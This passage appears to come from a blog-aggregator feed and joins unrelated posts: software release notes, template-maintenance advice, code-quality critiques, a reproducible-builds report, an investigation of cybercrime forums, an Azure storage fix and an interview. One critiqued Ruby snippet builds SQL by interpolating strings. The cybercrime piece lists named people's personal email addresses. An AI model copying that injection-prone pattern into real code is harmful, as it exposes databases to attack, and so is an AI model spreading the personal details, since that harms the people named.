/ vignette) by Conrad and myself has been cited 612 times according
to Google Scholar.
Conrad released a minor
version 14.2.3 yesterday. As it has been two months since the last
minor release, we prepared a new version for CRAN too which arrived there early
this morning.
The changes since the last CRAN release are summarised
below.
Changes in
RcppArmadillo version 14.2.3-1 (2025-02-05)
Upgraded to Armadillo release 14.2.3 (Smooth Caffeine)
Minor fix for declaration of xSYCON and
xHECON functions in LAPACK
Cookiecutter is a tool for building coding project templates. It’s often used to provide a scaffolding to build lots of similar projects. I’ve seen it used to create Symfony projects and several cloud infrastructures deployed with Terraform. This tool was useful to accelerate the creation of new projects.
Since these templates were bound to evolve, the teams providing these templates relied on cruft to update the code provided by the template in their users’ code. In other words, they wanted their users to apply a diff of the template modifications to their code.
At the beginning, all was fine. But problems began to appear during the lifetime of these projects.
What went wrong?
In both cases, we had the following scenario:
user team:
creates new project with cookiecutter template
makes modification on their code, including on code provided by template
meanwhile, provider team:
makes modifications to cookiecutter template
releases new template version
asks its users to update the code brought by the template using cruft
user team then:
runs cruft to update template code
discovers a lot of code conflicts (similar to git merge conflicts)
often rolls back cruft update and gives up on template update
The user team giving up on updates is a major problem because these updates may bring security or compliance fixes.
Note that code conflicts seen with cruft are similar to git merge conflicts, but harder to resolve because, unlike with a git merge, there’s no common ancestor, so 3-way merges are not possible.
From an organisation point of view, the main problem is the ambiguous ownership of the functionalities brought by template code: who owns this code? The provider team who writes the template, or the user team who owns the repository of the code generated from the template? Conflicts are bound to happen.
Possible solutions to get out of this tar pit:
Assume that templates are one-shot. Template updates are not practical in the long run.
Make sure that templates are as thin as possible. They should contain minimal logic.
Move most if not all logic into separate libraries or scripts that are owned by the provider team. This way, updates coming from the provider team can be managed like external dependencies by upgrading the version of a dependency.
Of course your users won’t be happy to be faced with a manual migration from the old big template to the new one with external dependencies. On the other hand, this may be easier to sell than updates based on cruft, since the painful work will happen only once. Further updates will be done by incrementing dependency versions (which can be automated with renovate).
If many projects are to be created with this template, it may be more practical to provide a CLI that will create a skeleton project. See for instance the terragrunt scaffold command.
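As a rough sketch of that approach, cookiecutter's Python API can be wrapped in a small project-creation command; the template URL and context keys below are hypothetical:
from cookiecutter.main import cookiecutter

# Generate a thin skeleton; all real logic lives in versioned libraries owned by the provider team.
cookiecutter(
    "https://github.com/example-org/thin-project-template",  # hypothetical template
    no_input=True,
    extra_context={"project_name": "demo", "provider_lib_version": "2.1.0"},
)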
My name is Dominique Dumont, I’m a devops freelance. You can find the devops and audit services I propose on my website or reach out to me on LinkedIn.
We are pleased to announce that Proxmox has
committed to sponsor DebConf25 as a
Platinum Sponsor.
Proxmox develops powerful, yet easy-to-use Open Source server software. The
product portfolio from Proxmox, including server virtualization, backup, and
email security, helps companies of any size, sector, or industry to simplify
their IT infrastructures. The Proxmox solutions are based on the great Debian
platform, and we are happy that we can give back to the community by sponsoring
DebConf25.
With this commitment as Platinum Sponsor, Proxmox is contributing to the Debian
annual Developers' conference, directly supporting the progress of Debian and
Free Software. Proxmox contributes to strengthening the community that
collaborates on Debian projects from all around the world throughout
the year.
Thank you very much, Proxmox, for your support of DebConf25!
Become a sponsor too!
DebConf25 will take place from 14 to 20
July 2025 in Brest, France, and will be preceded by DebCamp, from 7 to 13
July 2025.
Sammy's company "jumped on the Ruby on Rails bandwagon since there was one on which to jump", and are still very much a Rails shop. The company has been around for thirty years, and in that time has seen plenty of ups and downs. During one of those "ups", management decided they needed to scale up, both in terms of staffing and in terms of client base- so they hired an offshore team to promote international business and add to their staffing.
A "down" followed not long after, and the offshore team was disbanded. So Sammy inherited the code.
I know I'm generally negative on ORM systems, and that includes Rails, but I want to stress: they're fine if you stay on the happy path. If your data access patterns are simple (and most applications are just basic CRUD!), there's nothing wrong with using an ORM. But if you're doing that, you need to use the ORM. Which is not what the offshore team did. For example:
class Request < ActiveRecord::Base
  def self.get_this_years_request_ids(facility_id) # There are several other methods that are *exactly* the same, except for the year
    requests = Request.where("requests.id in (select t.id from requests as t # what is the purpose of this subquery?
      where t.unit_id=token_requests.unit_id and t.facility_id=token_requests.facility_id
      and t.survey_type = '#{TokenRequest::SURVEY_TYPE}' # why is SURVEY_TYPE a constant?
      and EXTRACT( YEAR FROM created_at) = EXTRACT(YEAR FROM current_timestamp)
      order by t.id desc) and token_requests.facility_id = #{facility_id.to_i} # so we get all the requests by year, then by by ???
      and token_requests.survey_type = '#{Request::SURVEY_TYPE}'")
Comments from Sammy.
Now, if we just look at the signature of the method, it seems like this should be a pretty straightforward query: get all of the request IDs for a given facility ID, within a certain time range.
And Sammy has helpfully provided a version of this code which does the same thing, but in a more "using the tools correctly" way:
Now, I don't know Ruby well enough to be sure, but the DateTime.new(year.to_i) whiffs a bit of clumsy date handling, though that may be a perfectly cromulent idiom in Ruby. But this code is pretty clear about what it's doing: finding request objects for a given facility within a given year. Why one uses Request and the other uses TokenRequest is a mystery to me- I'm going to suspect some bad normalization in the database or errors in how Sammy anonymized the code. That's neither here nor there.
Once we've gotten our list of requests, we need to process them to output them. Here's how the offshore code converted the list into a comma delimited string, wrapped in parentheses.
Look, if the problem is to "join a string with delimiters" and you write code that looks like this, just delete your hard drive and start over. You need extra help.
We start by defaulting to (-1) which is presumably a "no results" indicator. But if we have results, we'll iterate across those results. If our result string is non-empty (which it definitely is non-empty), we append a comma (giving us (-1),). Then we append the current token ID, giving us (-1),5, for example. Once we've exhausted all the returned IDs, we wrap the whole thing in parentheses.
So, this code is wrong- it's only supposed to return (-1) when there are no results, but as written, it embeds that in the results. Presumably the consuming code is able to handle that error gracefully, since the entire project works.
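For comparison, the intended behaviour (a comma-separated list of IDs wrapped in parentheses, with (-1) only when there are no results) fits in a couple of lines in most languages; here is a rough sketch in Python, purely for illustration:
def format_ids(ids):
    # "(-1)" only when the result set is empty, otherwise "(5,8,13)"
    return "(" + (",".join(str(i) for i in ids) or "-1") + ")"

print(format_ids([]))          # (-1)
print(format_ids([5, 8, 13]))  # (5,8,13)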
Sammy provides us a more idiomatic (and readable) version of the code which also works correctly:
I'll be honest, I hate the fact that this is returning a stringly-typed list of integers, but since I don't know the context, I'll let that slide. At the very least, this is a better example of what joining a list of values into a string should look like.
Sammy writes:
It seems these devs never took the time to learn the language. After asking around a bit, I found out they all came from a Java background. Most of this code seems to be from a VB playbook, though.
That's a huge and undeserved insult to Visual Basic programmers, Sammy. Even they're not that bad.
Author: Eric San Juan She reached down for the water bottle at her side, remembered it was empty only when she brought to her lips, sighed, and hung her head. “I should have stayed in the city.” She knew she was wrong about that, of course. The city is where it all started. Things were […]
If you use SteamOS and you like to install third-party tools or modify the system-wide configuration some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know SteamOS uses an immutable root filesystem and users are not expected to modify it because all changes are lost after an OS update.
However this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it’s a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc).
/etc contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don’t conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update.
SteamOS 3.6 introduced a new mechanism to decide what to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded1.
However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept.
There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
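Conceptually, the updater treats the keep list as a filter over the old /etc overlay. The sketch below (Python, with made-up patterns; not the actual SteamOS implementation or its file format) illustrates the idea:
import fnmatch

# patterns collected from the built-in list plus /etc/atomic-update.conf.d (illustrative only)
keep_patterns = ["NetworkManager/system-connections/*", "ssh/ssh_host_*", "shadow"]

def should_keep(path):
    return any(fnmatch.fnmatch(path, pattern) for pattern in keep_patterns)

print(should_keep("ssh/ssh_host_ed25519_key"))  # True: carried over to the new /etc
print(should_keep("my-third-party-tool.conf"))  # False: discarded unless added to a keep list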
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer:
As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup
Our monthly reports outline what we’ve been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As usual, though, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website.
The last few months saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering that is rebuilderd, our server designed to monitor the official package repositories of Linux distributions and attempt to reproduce the observed results there.
Giacomo Benedetti, Oreofe Solarin, Courtney Miller, Greg Tystahl, William Enck, Christian Kästner, Alexandros Kapravelos, Alessio Merlo and Luca Verderame published an interesting article recently. Titled An Empirical Study on Reproducible Packaging in Open-Source Ecosystem, the abstract outlines its optimistic findings:
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
Answering strongly in the affirmative, a second article’s abstract reads as follows:
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.
Distribution work
There has been the usual work in various distributions this month, such as:
10+ reviews of Debian packages were added, 11 were updated and 10 were removed this month adding to our knowledge about identified issues. A number of issue types were updated also.
The FreeBSD Foundation announced that “a planned project to deliver zero-trust builds has begun in January 2025”. Supported by the Sovereign Tech Agency, this project is centered on the various build processes, and the “primary goal of this work is to enable the entire release process to run without requiring root access, and that build artifacts build reproducibly – that is, that a third party can build bit-for-bit identical artifacts.” The full announcement can be found online, which includes an estimated schedule and other details.
Following up on a substantial amount of previous work pertaining to the Sphinx documentation generator, James Addison asked a question about the relationship between the SOURCE_DATE_EPOCH environment variable and testing, which generated a number of replies.
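For context, honouring SOURCE_DATE_EPOCH is usually a small change in a generator: use the timestamp from the environment, when set, instead of the current time. A minimal Python sketch:
import datetime
import os
import time

def build_timestamp():
    # fall back to "now" only when SOURCE_DATE_EPOCH is not exported
    epoch = int(os.environ.get("SOURCE_DATE_EPOCH", time.time()))
    return datetime.datetime.fromtimestamp(epoch, tz=datetime.timezone.utc).isoformat()

print(build_timestamp())  # identical across rebuilds whenever SOURCE_DATE_EPOCH is set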
Adithya Balakumar of Toshiba asked a question about whether it is possible to make ext4 filesystem images reproducible. Adithya’s issue is that even the smallest amount of post-processing of the filesystem results in the modification of the “Last mount” and “Last write” timestamps.
FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests — for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them — to fail.
Upstream patches
The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:
diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 285, 286 and 287 to Debian:
Security fixes:
Validate the --css command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report. […]
Prevent XML entity expansion attacks. Thanks to Florian Wilkens from SRLabs for the report. […][…]
Print a warning if we have disabled XML comparisons due to a potentially vulnerable version of pyexpat. […]
Bug fixes:
Correctly identify changes to only the line-endings of files; don’t mark them as Ordering differences only. […]
When passing files on the command line, don’t call specialize(…) before we’ve checked that the files are identical or not. […]
Do not exit with a traceback if paths are inaccessible, either directly, via symbolic links or within a directory. […]
Don’t cause a traceback if cbfstool extraction failed. […]
Use the surrogateescape mechanism to avoid a UnicodeDecodeError and crash when decoding any zipinfo output that is not UTF-8 compliant. […]
Testsuite improvements:
Don’t mangle newlines when opening test fixtures; we want them untouched. […]
In addition, fridtjof added support for the ASAR.tar-like archive format. […][…][…][…] and lastly, Vagrant Cascadian updated diffoscope in GNU Guix to version 285 […][…] and 286 […][…].
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-1 was uploaded to Debian unstable by Chris Lamb, making the following the changes:
Clarify the --verbose and non --verbose output of bin/strip-nondeterminism so we don’t imply we are normalizing files that we are not. […]
Update the website’s README to make the setup command copy & paste friendly. […]
Reproducibility testing framework
The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
Ed Maste modified the FreeBSD build system to clean the object directory before commencing a build. […]
Gioele Barabucci updated the rebuilder stats to first add a category for network errors […] as well as to categorise failures without a diffoscope log […].
Jessica Clarke also made some FreeBSD-related changes, including:
Ensuring we clean up the object directory for the second build as well. […][…]
Updating the sudoers for the relevant rm -rf command. […]
Update the cleanup_tmpdirs method to match other removals. […]
Update the reproducible_debstrap job to call Debian’s debootstrap with the full path […] and to use eatmydata as well […][…].
Make some changes to deduce the CPU load in the debian_live_build job. […]
Lastly, both Holger Levsen […] and Vagrant Cascadian […] performed some node maintenance.
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:
Tim has been working on a large C++ project which has been around for many, many years. It's a tool built for, in Tim's words, "an esoteric field", and most of the developers over the past 30 years have been PhD students.
This particular representative line is present with its original whitespace, and the original variable names. It has been in the code base since 2010.
Assignment::Ptr ra = Assignment::makeAssignment(I,
addr,
func,
block,
RA);
The extra bonus is that Assignment::Ptr is actually an alias for boost::shared_ptr<Assignment>. As you might gather from the name shared_ptr, that's a reference-counted way to manage pointers to memory, and thus avoid memory leaks.
The developers just couldn't tolerate using the names provided by their widely used library solving a widely understood problem, and needed to invent their own names, which made the code less clear. The same is true for makeAssignment. And this pattern is used for nearly every class, because the developers involved didn't understand object lifetimes, when to allow things to be stack allocated, or how ownership should really work in an application.
This is hardly the only WTF in the code, but Tim says:
Preceding the 98 standard, there is a LOT of C-with-classes code. But this representative line speaks to the complete lack of thought that has gone into much of the codebase. That whitespace is as-is from the source.
Author: Hillary Lyon The Holographic Wildlife Museum was a major draw for the city, with its representation of Earth’s extinct and endangered animals. Vera loved the idea of viewing facsimiles of majestic creatures in their natural habitats, even if it was through holograms. Besides, hologram technology had come a long way since her youth, when […]
The FBI joined authorities across Europe last week in seizing domain names for Cracked and Nulled, English-language cybercrime forums with millions of users that trafficked in stolen data, hacking tools and malware. An investigation into the history of these communities shows their apparent co-founders quite openly operate an Internet service provider and a pair of e-commerce platforms catering to buyers and sellers on both forums.
In this 2019 post from Cracked, a forum moderator told the author of the post (Buddie) that the owner of the RDP service was the founder of Nulled, a.k.a. “Finndev.” Image: Ke-la.com.
On Jan. 30, the U.S. Department of Justice said it seized eight domain names that were used to operate Cracked, a cybercrime forum that sprang up in 2018 and attracted more than four million users. The DOJ said the law enforcement action, dubbed Operation Talent, also seized domains tied to Sellix, Cracked’s payment processor.
In addition, the government seized the domain names for two popular anonymity services that were heavily advertised on Cracked and Nulled and allowed customers to rent virtual servers: StarkRDP[.]io, and rdp[.]sh.
Those archived webpages show both RDP services were owned by an entity called 1337 Services Gmbh. According to corporate records compiled by Northdata.com, 1337 Services GmbH is also known as AS210558 and is incorporated in Hamburg, Germany.
The Cracked forum administrator went by the nicknames “FlorainN” and “StarkRDP” on multiple cybercrime forums. Meanwhile, a LinkedIn profile for a Florian M. from Germany refers to this person as the co-founder of Sellix and founder of 1337 Services GmbH.
Northdata’s business profile for 1337 Services GmbH shows the company is controlled by two individuals: 32-year-old Florian Marzahl and Finn Alexander Grimpe, 28.
An organization chart showing the owners of 1337 Services GmbH as Florian Marzahl and Finn Grimpe. Image: Northdata.com.
Neither Marzahl nor Grimpe responded to requests for comment. But Grimpe’s first name is interesting because it corresponds to the nickname chosen by the founder of Nulled, who goes by the monikers “Finn” and “Finndev.” NorthData reveals that Grimpe was the founder of a German entity called DreamDrive GmbH, which rented out high-end sports cars and motorcycles.
The email address used for those accounts was f.grimpe@gmail.com. DomainTools.com reports f.grimpe@gmail.com was used to register at least nine domain names, including nulled[.]lol and nulled[.]it. Neither of these domains were among those seized in Operation Talent.
Intel471 finds the user FlorainN registered across multiple cybercrime forums using the email address olivia.messla@outlook.de. The breach tracking service Constella Intelligence says this email address used the same password (and slight variations of it) across many accounts online — including at hacker forums — and that the same password was used in connection with dozens of other email addresses, such as florianmarzahl@hotmail.de, and fmarzahl137@gmail.com.
The Justice Department said the Nulled marketplace had more than five million members, and has been selling stolen login credentials, stolen identification documents and hacking services, as well as tools for carrying out cybercrime and fraud, since 2016.
Perhaps fittingly, both Cracked and Nulled have been hacked over the years, exposing countless private messages between forum users. A review of those messages archived by Intel 471 showed that dozens of early forum members referred privately to Finndev as the owner of shoppy[.]gg, an e-commerce platform that caters to the same clientele as Sellix.
Shoppy was not targeted as part of Operation Talent, and its website remains online. Northdata reports that Shoppy’s business name — Shoppy Ecommerce Ltd. — is registered at an address in Gan-Ner, Israel, but there is no ownership information about this entity. Shoppy did not respond to requests for comment.
Constella found that a user named Shoppy registered on Cracked in 2019 using the email address finn@shoppy[.]gg. Constella says that email address is tied to a Twitter/X account for Shoppy Ecommerce in Israel.
The DOJ said one of the alleged administrators of Nulled, a 29-year-old Argentinian national named Lucas Sohn, was arrested in Spain. The government has not announced any other arrests or charges associated with Operation Talent.
Indeed, both StarkRDP and FloraiN have posted to their accounts on Telegram that there were no charges levied against the proprietors of 1337 Services GmbH. FlorainN told former customers they were in the process of moving to a new name and domain for StarkRDP, where existing accounts and balances would be transferred.
“StarkRDP has always been operating by the law and is not involved in any of these alleged crimes and the legal process will confirm this,” the StarkRDP Telegram account wrote on January 30. “All of your servers are safe and they have not been collected in this operation. The only things that were seized is the website server and our domain. Unfortunately, no one can tell who took it and with whom we can talk about it. Therefore, we will restart operation soon, under a different name, to close the chapter [of] ‘StarkRDP.'”
In my last blog, I explained how we resolved a throttling issue involving Azure storage API. In the end, I mentioned that I was not sure of the root cause of the throttling issue.
Even though we no longer had any problem in the dev and preprod clusters, we still faced throttling issues in prod. The main difference between these environments is that we have about 80 PVs in prod versus 15 in the other environments. Given that we manage 1500 pods in prod, 80 PVs does not look like a lot.
To continue the investigation, I modified k8s-scheduled-volume-snapshotter to limit the number of snapshots done in a single cron run (see the add maxSnapshotCount parameter pull request).
In prod, we used the modified snapshotter to trigger snapshots one by one.
Even with all previous snapshots cleaned up, we could not trigger a single new snapshot without being throttled. I guess that, in the cron job, just checking the list of PVs to snapshot was enough to exhaust our API quota.
The Azure documentation mentions that a leaky bucket algorithm is used for throttling. A full bucket holds tokens for 250 API calls, and the bucket gets 25 new tokens per second. Looks like that is not enough.
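For intuition, those numbers can be modelled with a tiny token bucket (a rough sketch, not Azure's actual implementation):
import time

class TokenBucket:
    def __init__(self, capacity=250, refill_per_sec=25):
        self.capacity = capacity
        self.refill_per_sec = refill_per_sec
        self.tokens = capacity
        self.last = time.monotonic()

    def allow(self):
        now = time.monotonic()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.refill_per_sec)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # the API would answer with a throttling error here

bucket = TokenBucket()
accepted = sum(bucket.allow() for _ in range(1000))  # a sudden burst of 1000 calls
print(f"{accepted} calls accepted, {1000 - accepted} throttled")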
I was puzzled and out of ideas.
I looked for similar problems in AKS issues on GitHub, where I found this comment that recommends using the useDataPlaneAPI parameter in the CSI file driver. That was it!
I was flabbergasted by this parameter: why is the CSI file driver able to use two APIs? Why is one of them so limited? And more importantly, why is the limited API the default one?
Anyway, setting useDataPlaneAPI: "true" in our VolumeSnapshotClass manifest was the right solution. This indeed solved the throttling issue in our prod cluster.
But not the snapshot issue. Amongst the 80 PVs, I still had 2 snapshots failing.
Fortunately, the error was mentioned in the description of the failed snapshots: we had too many (200) snapshots for these shared volumes.
What?? All these snapshots were cleaned up last week.
I then tried to delete these snapshots through the Azure console. But the console failed to delete these snapshots due to API throttling. Looks like the Azure console is not using the right API.
Anyway, I went back to the solution explained in my previous blog: I listed all snapshots with the az command. I indeed had a lot of snapshots, many of them dated Jan 19 and 20. There was often a new bogus snapshot created every minute.
These were created during the first attempt at fixing the throttling issue. I guess that even though the CSI file driver was throttled, a snapshot was still created in the storage account, but the CSI driver did not see it and retried a minute later. What a mess.
Anyway, I’ve cleaned up these bogus snapshots again, and now snapshot creation is working fine.
There are a lot of cases where the submission is "this was server side generated JavaScript and they were loading constants". Which, honestly, is a WTF, but it isn't interesting code. Things like this:
if (false === true)
{
// do stuff
}
That's absolutely the wrong way to do that, and I hate it, but there's just so many times you can say, "send server-side values to the client as an object, not inline".
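The usual fix is to serialize the values once and let them keep their types. A minimal sketch of the server side in Python (the variable names are hypothetical):
import json

# booleans computed server-side stay booleans on the client
flags = {"isMobile": False, "isAndroid": False, "isIPad": False, "isIPhone": False}

page = f"""<script>
  var clientFlags = {json.dumps(flags)};
  if (clientFlags.isMobile) {{ /* mobile-only behaviour */ }}
</script>"""
print(page)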
But Daniel's electrical provider decided to come up with an example of this that really takes it to the next level of grossness.
var isMobile = "" === "true";
var isAndroid = "" === "true";
var isIPad = "" === "true";
var isIPhone = "" === "true";
For starters, they're doing device detection on the server side, which isn't the worst possible idea, but it means they're relying on header fields or worse: the user agent string. Maybe they're checking the device resolution. The fact that they're naming specific devices instead of browser capabilities hints at a terrible hackjob of reactive webdesign- likely someone wrote a bunch of JavaScript that alters the desktop stylesheet to cram the desktop site onto a mobile device. But that's just background noise.
Look at that code.
First, we've got some lovely order-of-operations abuse: === has higher precedence than =, which makes sense but hardly makes this code readable. The first time I saw this, my brain wanted the assignment to happen first.
But what's really special to me is the insistence on making this stringly typed. They control both sides of the code, so they could have just done booleans on both sides. And sure, there's a world where they're just dumb, or didn't trust their templating engine to handle that well.
I've seen enough bad code, though, to have a different suspicion. I can't confirm it, but c'mon, you know in your hearts this is true: the function which is doing device detection returns a string itself, and that string isn't always a boolean for some reason. So they needed to wrap the output in quotes, because that was the only way to make sure that the JavaScript actually could be executed without a syntax error.
I can't be sure that's true from this little snippet. But look at this code, and tell me that someone didn't make that mistake.
Author: Jared S Moya A sharp pain pierced Darya’s side. His knees buckled as he drew his hand to the wound and toppled to the ground. His shoulder slammed into the packed dirt of the dry riverbed, his teeth clacking against each other. Rolling onto his back, he noticed a lancer round had penetrated his […]
Some time ago I may have accidentally bought a ring of 12 RGB LEDs; I soldered
temporary leads on it, connected it to a CircuitPython supported board
and played around for a while.
Then we had a couple of friends come over to remote FOSDEM together, and
I had talked with one of them about WS2812 / NeoPixels, so I brought
them to the living room, in case there was a chance to show them in
sort-of-use.
Then I was dealing with playing the various streams as we moved from one
room to the next, which led to me being called “video team”, which led
to me wearing a video team shirt (from an old DebConf, not FOSDEM, but
still video team), which led to somebody asking me whether I also had
the sheet with the countdown to the end of the talk, and the answer was
sort-of-yes (I should have the ones we used to use for our Linux Day),
but not handy.
But I had a thing with twelve things in a clock-like circle.
A bit of fiddling on the CircuitPython REPL resulted, if I remember
correctly, in something like:
import board
import neopixel
import time
num_pixels = 12
pixels = neopixel.NeoPixel(board.GP0, num_pixels)
pixels.brightness = 0.1
def end(min):
    pixels.fill((0, 0, 0))                           # start with the ring dark
    for i in range(12):
        pixels[i] = (127 + 10 * i, 8 * (12 - i), 0)  # colour drifts towards red as time runs out
        pixels[i-1] = (0, 0, 0)                      # clear the previous LED so a single dot walks the ring
        time.sleep(min * 5)                          # min * 60 / 12
Now, I wasn’t very consistent in running end, especially since I
wasn’t sure whether I wanted to run it at the beginning of the talk with
the full duration or just in the last 5 - 10 minutes depending on the
length of the slot, but I’ve had at least one person agree that the
general idea has potential, so I’m taking these notes to be able to work
on it in the future.
One thing that needs to be fixed is the fact that with the ring just
attached with temporary wires and left on the table it isn’t clear which
LED is number 0, so it will need a bit of a case or something, but
that’s something that can be dealt with before the next FOSDEM.
And I should probably add some input interface, so that it is
self-contained and not tethered to a computer and run from the REPL.
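A possible next step, sketched below in CircuitPython (untested; the pin name GP1 and the pull-up wiring are assumptions): poll a push button and kick off the countdown defined above.
import time

import board
import digitalio

button = digitalio.DigitalInOut(board.GP1)      # hypothetical spare pin
button.switch_to_input(pull=digitalio.Pull.UP)  # button wired between GP1 and ground

while True:
    if not button.value:                        # pressed (active low)
        end(5)                                  # run the 5-minute countdown defined above
    time.sleep(0.05)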
(And then I may also have a vague idea for putting that ring into some
wearable thing: good thing that I actually bought two :D )
JOIN US IN PERSON AND ONLINE for Ahmed Best's Long Now Talk, Feel the Future: A Valentine's Evening on February 14, 02025 at 7 PM PT at the Herbst Theatre in San Francisco.
Ahmed Best is an award-winning artist, educator, director, the host of the Afrofuturist podcast, and co-founder of the AfroRithm Futures Group, among other pursuits, including his role as Jar Jar Binks in Star Wars: Episode I. Ahmed teaches Dramatic Narrative Design, a course he created for Film and Actor entrepreneurship at USC School of Dramatic Arts. He is also a Senior Fellow at USC Annenberg School for Communication and Journalism, and a visiting professor at Stanford’s Hasso Plattner Institute of Design.
If you could witness one event from the distant past or future, what would it be?
Distant future: I would love to see the first thing that we build — and it might not be a vessel — that can travel at the speed of light.
Distant past: The construction of the Pyramids of Giza. The bricks of the pyramids were formed with almost laser-like precision. I want to see how they did that. Was it a laser? Can you imagine the Egyptians harnessing, say, the power of the sun with a big piece of glass to where they could do a laser-cut of a brick of stone? Had not those who wanted to change the narrative of this civilization destroyed so many things, we might have known how they did it. Right now, it’s a mystery. People like to credit aliens, but I align with Neil deGrasse Tyson on this one: just because they were smarter than you doesn’t mean they came from another planet.
What’s one prediction about the future you’d be willing to make for Long Bets, our arena for accountable predictions?
A thousand years from now, we will have learned to move beyond the planet without carrying the problems of the past with us. This will come through a global cultural revolution. We will be ready to travel through to the stars without harm. We’ll be able to respect where we are going for what “where we are going” demands. We’re not going to impose our ideas of what respect is onto wherever we travel to.
If you had to choose a single artifact to represent our time in a far-future archive, what would it be?
To represent our time, I’d choose the smartphone. The idea of a smartphone was inspired by science fiction, but also there's a longer, almost pseudo-spiritual idea of a smartphone that connects the past to our present.
In his book African Fractals: Modern Computing and Indigenous Design (01999), the mathematician Ron Eglash studied the sand diviners of the Bamana people of Mali, who read peoples’ fortunes by drawing symbols in the sand. Eglash found that this system of divination uses a binary-like logic. Variants of this practice spread from Africa to Spain and the rest of Europe during the Islamic Golden Age, where it was known as geomancy. Leibniz was inspired by geomancy when he created a binary system of ones and zeros, which eventually became the foundation for the development of the digital computer — and, ultimately, the smartphone.
The connection I love to draw is that the primary material of smartphones is silicon, which comes from sand. So, in a sense, when we use our smartphones, we are engaging in a modern form of “sand divination,” just like the ancient sand diviners did in actual sand.
What’s the most surprising way history has repeated itself in your field?
What surprises me most is how every generation puts technology — and the monetary gain it brings — above creativity. The creativity of the time creates a technology of the time, and then everybody focuses so much on replicating the technology but not supporting the creativity that got you there in the first place. It’s a cycle that has repeated itself throughout history. You can see it in the history of music, in writing, in social media — in any kind of storytelling that can be replicated and shared.
Today, we’re at an inflection point where we have so much technology that we build it without having any idea what the use for it is. We put it out there and expect that somebody creative can figure out how to monetize it. We keep putting the creative people — who can actually influence culture in a way that moves us forward optimistically towards change — in a box. We don’t give them the resources to move us forward because we got locked into the amount of technology we can make at a mass scale to acquire as much monetary gain as possible.
Changing this cycle would require a shift in what we choose to value. I’m a big Trekkie; everything comes down to Star Trek. Imagine a Star Trek-like future where human experience, expression and exploration are the commodity and not excess and greed. Unfortunately, we might need Vulcans to come down to make that happen.
What are some books you would recommend for inclusion in The Manual For Civilization, our crowd-curated library of 3,500 books of essential civilizational knowledge?
The Nutmeg’s Curse: Parables for a Planet in Crisis (02021) by Amitav Ghosh. This book explores capitalism and imperialism from the point of view of nutmeg, which was the most expensive commodity on the planet in the 14th and 15th centuries. Nutmeg could buy you a house in Europe. Ghosh brilliantly frames the story of colonization — the very notion of which stemmed from this desire for nutmeg — through a small island in the Indian Ocean that was the only place where nutmeg was found at the time.
Just because you get fired doesn't mean that your pull requests are automatically closed. Dallin was in the middle of reviewing a PR by Steve when the email came out announcing that Steve no longer worked at the company.
Let's take a look at that PR, and maybe we can see why.
This is the original code, which represents operations on investments. An investment is represented by a note, and belongs to one or more parties. The amount that can be drawn is set by a limit, which can belong to either the party or the note.
What our developer was tasked with doing was to allow a note to have no limit. This means changing all the places where the note's limit is checked. So this is what they submitted:
You'll note here that the note limit isn't part of calculating the party limits, so both branches do the same thing. And then there's the deeper question of "is a null really the best way to represent this?" especially given that elsewhere in the code they have an "unlimited" flag that disables limit checking.
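The code itself isn't reproduced above, but the change described reads roughly like the sketch below. All of the types and names here are hypothetical stand-ins, not the actual code from the PR; the point is only that both branches of the new conditional compute the same thing.

```python
# Hypothetical sketch of the submitted change, not the actual PR.
from dataclasses import dataclass
from typing import Optional

@dataclass
class Limit:
    amount: float

@dataclass
class Party:
    limit: Limit

@dataclass
class Note:
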